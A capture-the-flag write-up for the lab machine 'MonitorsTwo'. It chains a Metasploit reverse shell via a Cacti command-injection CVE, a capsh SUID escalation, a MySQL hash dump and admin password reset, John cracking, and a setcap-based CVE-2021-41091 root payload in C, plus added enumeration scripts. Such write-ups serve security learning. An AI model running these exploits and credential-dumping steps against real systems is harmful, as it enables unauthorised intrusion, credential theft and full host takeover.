MonitorsTwo
Write up for the HTB machine 'MonitorsTwo'
1. Initial recon
1.1. nmap
nmap -sC -sV 10.10.11.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2. nikto
nikto -host 10.10.11.211
+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
1.3. website recon
Most of the nikto hits above are false positives: the server returns a valid response for paths that do not exist (nikto's own "junk HTTP methods" warning says as much), so the WordPress backdoor and D-Link findings are noise on a site that is not WordPress at all. The useful information is on the login page itself, which shows the application and its version: Cacti 1.2.22. A quick search for that version turns up CVE-2022-46169, an unauthenticated command injection affecting Cacti up to 1.2.22, and Metasploit has a module for it.
1.4. msfconsole
In msfconsole run search cacti and then select the module by its full name rather than by its search index, since the index changes between Metasploit versions:
use exploit/linux/http/cacti_unauthenticated_cmd_injection
Set the options:
set rhosts 10.10.11.211
set rport 80
set target 0
set lhost YOUR_IP
then exploit
This gives us a reverse shell as the user www-data. The exploit is not completely reliable: if no session comes back the first time, run it again until it does.
1.5. root?
We can find SUID binaries with the following command:
find / -type f -perm -04000 -ls 2>/dev/null
The output shows the SUID bit set on /sbin/capsh, and following GTFOBins we escalate to root with:
/sbin/capsh --gid=0 --uid=0 --
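As an added example (not part of the original write-up), here is a small shell helper that enumerates SUID binaries and flags the ones that are not in a baseline of binaries that are normally setuid. The BASELINE list is an assumption (a typical Ubuntu set) and should be adjusted for the target; on this box it would single out /sbin/capsh, which is then worth looking up on GTFOBins.

```shell
#!/bin/sh
# Added example: list SUID binaries and flag the ones outside a baseline.
# BASELINE is an assumed, typical-Ubuntu list of binaries that are normally
# setuid; anything not in it deserves a closer look.
BASELINE="sudo su passwd chsh chfn gpasswd newgrp mount umount fusermount pkexec ssh-keysign dbus-daemon-launch-helper"

# list_suid ROOT: print every setuid regular file under ROOT (default /)
list_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null || true
}

# in_baseline NAME: succeed if NAME is one of the baseline binaries
in_baseline() {
    for b in $BASELINE; do
        if [ "$1" = "$b" ]; then
            return 0
        fi
    done
    return 1
}

# unusual_suid ROOT: print setuid files whose basename is not in BASELINE
unusual_suid() {
    list_suid "$1" | while IFS= read -r path; do
        if ! in_baseline "$(basename "$path")"; then
            printf '%s\n' "$path"
        fi
    done
}

# usage: sh suid_triage.sh /   (walks the whole filesystem, so only on demand)
if [ "$#" -gt 0 ]; then
    unusual_suid "$1"
fi
```

Matching on the basename keeps the list short but means a binary dropped somewhere unusual under a familiar name (a second "passwd" in /tmp, say) would be hidden; compare full paths against a known-good image if that matters.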
But when we look in /root there is nothing there... hmm. The reason is that this shell is inside a Docker container running Cacti, not on the host itself; being root here only gives us the container.
2. user.txt
As root in the container we can read the entrypoint.sh script in the filesystem root; it contains the MySQL connection details for the Cacti database (host db, user root, password root). Reusing them, we reset the admin password:
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET password=md5('admin') where username='admin'"
Cacti stores bcrypt hashes but still accepts legacy MD5 hashes, so admin:admin now lets us log in to the web application. Looking through the configuration (the user management page) we find another username: marcus.
2.1. mysql
Taking more inspiration from entrypoint.sh, we can query the database directly to leak credentials:
mysql --host=db --user=root --password=root cacti -e 'show tables'
lists the tables stored in the cacti database, and
mysql --host=db --user=root --password=root cacti -e 'select * from user_auth'
dumps every row of the user_auth table, which contains the password hashes.
Copy the hash for the user marcus, $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C (a bcrypt hash, recognisable by the $2y$ prefix), into hash.txt and crack it with John the Ripper:
john --format=bcrypt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
This yields the credentials marcus:funkymonkey.
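An added example, not from the write-up: a shell helper that turns the tab-separated output of the user_auth query into John input files, split by hash type so each file can be cracked with the right --format (John cannot mix bcrypt and raw MD5 in one run). The sample rows are constructed for illustration, apart from marcus' bcrypt hash, which is the one dumped above; the helper assumes the query selects only username and password, in that order.

```shell
#!/bin/sh
# Added example: split a Cacti user_auth dump into per-format john files.
# Input (stdin) is the output of
#   mysql --host=db --user=root --password=root cacti \
#       -e 'select username,password from user_auth'
# i.e. a header line followed by tab-separated "username<TAB>hash" rows.
# Cacti 1.2 stores bcrypt ($2y$) hashes but still accepts legacy 32-hex MD5,
# which is why resetting admin with md5('admin') worked.

# split_hashes OUTDIR: write OUTDIR/bcrypt.txt and OUTDIR/raw-md5.txt
split_hashes() {
    out="$1"
    mkdir -p "$out"
    : > "$out/bcrypt.txt"
    : > "$out/raw-md5.txt"
    awk -F'\t' -v out="$out" '
        NR == 1 { next }                                  # skip the header row
        $2 ~ /^[$]2[aby][$]/ {                            # bcrypt: $2a$/$2b$/$2y$
            print $1 ":" $2 > (out "/bcrypt.txt"); next
        }
        $2 ~ /^[0-9a-f]+$/ && length($2) == 32 {          # legacy md5 hex digest
            print $1 ":" $2 > (out "/raw-md5.txt"); next
        }
        { print "unrecognised hash for " $1 > "/dev/stderr" }
    '
}

# crack_commands OUTDIR: print one john invocation per non-empty file
crack_commands() {
    for fmt in bcrypt raw-md5; do
        if [ -s "$1/$fmt.txt" ]; then
            printf 'john --format=%s %s/%s.txt --wordlist=/usr/share/wordlists/rockyou.txt\n' \
                "$fmt" "$1" "$fmt"
        fi
    done
}

# sample_user_auth: constructed dump. The admin row is md5("admin") after the
# reset, the guest hash is a made-up bcrypt string, marcus' hash is the real one.
sample_user_auth() {
    printf 'username\tpassword\n'
    printf 'admin\t21232f297a57a5a743894a0e4a801fc3\n'
    printf 'guest\t$2y$10$Ab1cD2eF3gH4iJ5kL6mN7uXyZ0pQ9rS8tU7vW6xY5zA4bC3dE2fG1\n'
    printf 'marcus\t$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C\n'
}

# demo: split the constructed dump and print the john commands to run
demo_dir=$(mktemp -d)
sample_user_auth | split_hashes "$demo_dir"
crack_commands "$demo_dir"
```

Prioritise the raw-md5 file: those rows are either freshly reset accounts or very old ones, and MD5 cracks orders of magnitude faster than bcrypt cost 10.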
SSH into the machine with those credentials, but keep the Metasploit shell open too, as we will need it for the root flag.
user.txt
can be found in /home/marcus
3. root.txt
After some enumeration of the file system we find an email in /var/mail/marcus which mentions CVE-2021-41091. This is a Docker (Moby) bug: subdirectories of the data directory /var/lib/docker had insufficiently restricted permissions, so an unprivileged host user who knows the path can traverse into a container's filesystem and execute setuid or capability-bearing binaries that were created inside the container. CyberArk published a proof of concept, which we recreate on this machine.
In the marcus terminal run findmnt. The overlay mount for the container where we have root is listed with its path, here
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
(the hash differs per instance). Move into that directory.
Now in the root (container) terminal, create the following C file as payload.c in the container's / directory, which is what the merged directory above shows from the host:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* payload.c: the binary is given cap_setuid and cap_setgid with setcap, so an
 * unprivileged caller on the host can switch to uid/gid 0 and spawn a shell.
 * The privilege change is checked so that missing capabilities are reported
 * instead of silently dropping into a non-root shell. */
int main(void) {
    if (setuid(0) != 0 || setgid(0) != 0) {
        perror("setuid/setgid");
        return 1;
    }
    system("/bin/bash");
    return 0;
}
Compile it inside the container with gcc payload.c -o payload and then give the binary the capabilities it needs:
setcap cap_setgid,cap_setuid+eip payload
File capabilities are stored as an extended attribute on the file, so the host sees them on the same file through the overlay. Back in the marcus terminal, inside the merged directory, simply run the binary with ./payload
and we are root on the host!
root.txt
can be found in /root
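An added example, not from the write-up or from CyberArk's proof of concept: a host-side shell check for the CVE-2021-41091 precondition, the kind of thing to run as marcus before bothering with a payload. It parses the mount table (/proc/self/mountinfo, which is what findmnt reads and which any user may read) for overlay mounts, tests whether each merged directory is traversable by the current user, and lists setuid/setgid files and, where getcap is installed, files carrying capabilities inside it. The sample mountinfo line is constructed using the merged path from this box; its lowerdir/upperdir/workdir values are placeholders.

```shell
#!/bin/sh
# Added example: are container root filesystems reachable by this user, and
# do they contain privileged binaries? (the CVE-2021-41091 precondition)

# overlay_mountpoints: read mountinfo lines on stdin and print the mount point
# of every overlay mount. Format, per proc(5):
#   ID PARENT MAJ:MIN ROOT MOUNTPOINT OPTS [optional fields...] - FSTYPE SOURCE SUPEROPTS
# The "-" separator position varies with the optional fields, so scan for it.
# Assumption: mount points without spaces (a real one may contain \040 escapes).
overlay_mountpoints() {
    awk '{
        for (i = 7; i <= NF; i++)
            if ($i == "-") { if ($(i + 1) == "overlay") print $5; break }
    }'
}

# traversable DIR: succeed if DIR exists and we may enter it
traversable() {
    [ -d "$1" ] && [ -x "$1" ]
}

# privileged_files DIR: setuid/setgid regular files, plus files carrying
# capabilities when getcap is available (the payload above relies on those)
privileged_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null || true
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "$1" 2>/dev/null || true
    fi
}

# check_overlays [MOUNTINFO]: report each overlay mount and what it exposes
check_overlays() {
    overlay_mountpoints < "${1:-/proc/self/mountinfo}" | while IFS= read -r mp; do
        if traversable "$mp"; then
            printf 'EXPOSED %s\n' "$mp"
            privileged_files "$mp" | sed 's/^/    /'
        else
            printf 'not traversable %s\n' "$mp"
        fi
    done
}

# sample_mountinfo: constructed line in mountinfo format with this box's path
sample_mountinfo() {
    printf '2455 30 0:57 / /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged rw,relatime - overlay overlay rw,lowerdir=/l,upperdir=/u,workdir=/w\n'
}

# demo: extract the merged path from the constructed line
sample_mountinfo | overlay_mountpoints
# usage on a live host: sh check_overlays.sh /proc/self/mountinfo
if [ "$#" -gt 0 ]; then
    check_overlays "$1"
fi
```

On a patched Docker (20.10.9 and later) the data directory is no longer traversable by other users, so every overlay mount should come back as "not traversable"; an EXPOSED line with a setuid or capability-bearing file under it is the exact condition the payload above abuses.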